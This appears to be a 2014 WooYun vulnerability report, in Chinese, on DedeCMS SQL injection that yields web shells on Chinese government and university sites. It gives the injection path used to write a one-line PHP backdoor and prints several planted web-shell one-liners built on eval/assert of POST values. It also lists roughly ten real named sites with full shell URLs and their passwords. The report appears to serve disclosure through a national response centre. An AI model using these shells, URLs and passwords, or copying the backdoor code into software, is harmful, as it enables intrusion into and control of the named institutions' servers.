漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-079046
漏洞标题:十个政府大学网站沦陷成为马场
相关厂商:政府教育机构
漏洞作者: 路人甲
提交时间:2014-10-13 10:50
修复时间:2014-11-27 10:52
公开时间:2014-11-27 10:52
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-10-13: 细节已通知厂商并且等待厂商处理中
2014-10-16: 厂商已经确认,细节仅向厂商公开
2014-10-26: 细节向核心白帽子及相关领域专家公开
2014-11-05: 细节向普通白帽子公开
2014-11-15: 细节向实习白帽子公开
2014-11-27: 细节向公众公开
简要描述:
十个政府大学网站存在SQL注入漏洞导致Getshell,在检测的过程中发现了诸多网站早已被种植木马
详细说明:
1.前段时间看到某个报道说90%的Dedecms系统都存在漏洞,60%的Dedecms系统都可以Getshell,趁着十一假期放假,写了个脚本检测了一下
脚本的原理分两部分:
1.1 直接使用download.php注入,看能否得到shell。
检测原理参见http://zone.wooyun.org/content/4261
访问http://www.xxxxx.org/plus/mytag_js.php?aid=1117
生成一句话木马.
菜刀连接 http://www.xxxxxxxx.org/plus/mybak.php 密码 mybak
1.2 由于Dedecms站点被Getshell大部分是工具扫描的,所以我们可以通过检测常见一句话木马文件来判断网站是否被攻陷。收集互联网上常用download.php注入利用工具生成的一句话木马文件名(比如鬼哥的程序生成的是90sec.php ),并从已经Getshell的网站中查找一句话文件名,例从1.1中拿下的网站中可以找到如下常见一句话程序
/plus/mainbak.php <?php $a = "a"."s"."s"."e"."r"."t"; $a($_POST["k8"]); ?>
/plus/windos.php <?php assert($_POST[mgwl523]) ?>zozk
/plus/baidu.php <?php eval($_POST[xinsui]);?>VIP
/plus/e7xue.php <?php eval($_POST[e7xue]);?>www.e7xue.com
/plus\xsvip.php <?php eval($_POST[xinsui]);?>xinsui
对可疑Dedecms站点,检测是否存在上面这些文件,进而判断是否被Getshell
综上两种方法,发现下列站点存在Getshell的漏洞,而且大部分都已经沦为马场,诸多黑客留下了木马
http://library.upc.edu.cn/plus/qf.php cmd 中石油大学
http://www.guanglicn.com/plus/mybak.php mybak 广利集团
http://xcb.nedu.edu.cn/plus/mybak.php mybak
http://tjnhzx.gov.cn:808/plus/mybak.php mybak 天津政协
http://gs.njust.edu.cn/plus/mainbak.php k8 南京理工研究生院
http://jpn.bfsu.edu.cn/plus/06sec.php 6 北京外国语
http://ieer.uibe.edu.cn/plus/06sec.php 6 对外经贸大学
http://pyb.hfut.edu.cn/plus/06sec.php 6 合肥工业大学研究生院
http://www.gct-me.com.cn/plus/06sec.php 6 中国工程硕士网
http://www.haaysbb.gov.cn/plus/90sec.php guige 安阳市
http://library.upc.edu.cn/plus/qf.php 众多木马已成马场
漏洞证明:
修复方案:
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-10-16 15:02
厂商回复:
最新状态:
暂无